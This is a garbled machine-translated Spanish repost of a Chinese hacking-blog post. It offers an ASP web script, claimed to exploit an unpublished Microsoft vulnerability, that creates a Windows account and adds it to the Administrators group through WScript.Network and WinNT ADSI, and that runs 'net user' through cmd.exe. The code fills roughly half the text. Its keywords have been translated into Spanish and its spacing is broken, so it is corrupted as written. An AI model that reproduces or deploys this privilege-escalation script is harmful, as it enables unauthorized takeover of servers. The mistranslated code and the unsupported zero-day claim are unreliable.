Se agregó el código .asp del super usuario [Original de pantalla azul, Kevin Mejora, MS Vulnerabilidad no publicada

Código .asp de Super Usuario agregado [original de la pantalla azul, Kevin Mejoration, MS Vulnerabilidad no publicada]

Autor: Blue Screen, Artículo de Kevin Fuente: Punto de congelación Extreme

En realidad, Kevin y yo lo probamos en mi asador la semana pasada, y Hippo Epic. El resultado fue que los usuarios del grupo de administradores se agregaron con éxito bajo los permisos de usuario (aunque no puedo creer que mis ojos).

La última vez que Kevin no dijo nada, no me atreví a publicarlo ... ahora lo vi publicando en su blog, así que lo transfirí (fue un poco mejor que cuando lo probé la última vez, y agregué un formulario). Ahora tengo suerte para todos `` `` ``

De todos modos, el código es correcto, pero rara vez tiene éxito, depende de la suerte. . Jaja, siguiente paso quiero integrarlo en el océano. Hola.

La copia del código es la siguiente:

<LEAD> .NETWork Object Script Script Mejoramiento de la herramienta Exploit de Exploit </Head>

<formaction = "userAdd.asp" método = post>

Usuario: <inputName = "UserName" type = "text" value = "kevin1986"> <br>

Contraseña: <inputName = "passwd" type = "contraseña"> <br>

<inputType = "enviar" value = "add">

</form>

<%@codePage = 936

onerrorResumEnext

ifrequest.servervariables ("remoto_addr") <> "127.0.0.1" entonces

Response.Write "IP! Sn0Tright"

demás

ifrequest ("nombre de usuario") <> "" entonces

nombre de usuario = request ("nombre de usuario")

passwd = request ("passwd")

Respuesta.expires = 0

Session.TimeOut = 50

Servidor.scripttimeout = 3000

setlp = server.createObject ("wscript.network")

oz = "winnt: //" & lp.computername

Setob = getObject (Oz)

Setoe = getObject (Oz & "/administradores, grupo")

Setod = ob.create ("usuario", nombre de usuario)

OD.SetPasswordPasswd

OD.SetInfo

oe.addoz & "/" y nombre de usuario

iferrthen

Response.write "Hey ~~ No deberías comprar 6+1 hoy ... Es mejor ahorrar 2 yuanes para comprar una botella de Coca -Cola ..."

demás

ifinstr (server.createObject ("wscript.shell"). Exec ("cmd.exe/cnetuser" y username.stdout.readall), "Último inicio de sesión")> 0then

Respuesta. Escribe "Aunque no hay error, parece que no se ha establecido con éxito. Debe estar muy deprimido".

demás

Response.write "OMG!" & Username & "Cuenta realmente se convirtió! Esta es una escapatoria desconocida. 5,000,000 rmb es tuyo".

endif

endif

demás

Response.write "Ingrese el nombre de usuario"

endif

endif

%>

Artículos que pueden ser de interés para usted:

Rechaze el sistema de administración de host virtual extra estrella, el escritorio remoto de Super User FreeHostrunat, mejore el sistema de seguridad, varios métodos de adición de supervisión de supervención ocultas, recupere la contraseña de súper usuario de Redhat Linux 7.2, método de agregar súper usuario a los usuarios comunes.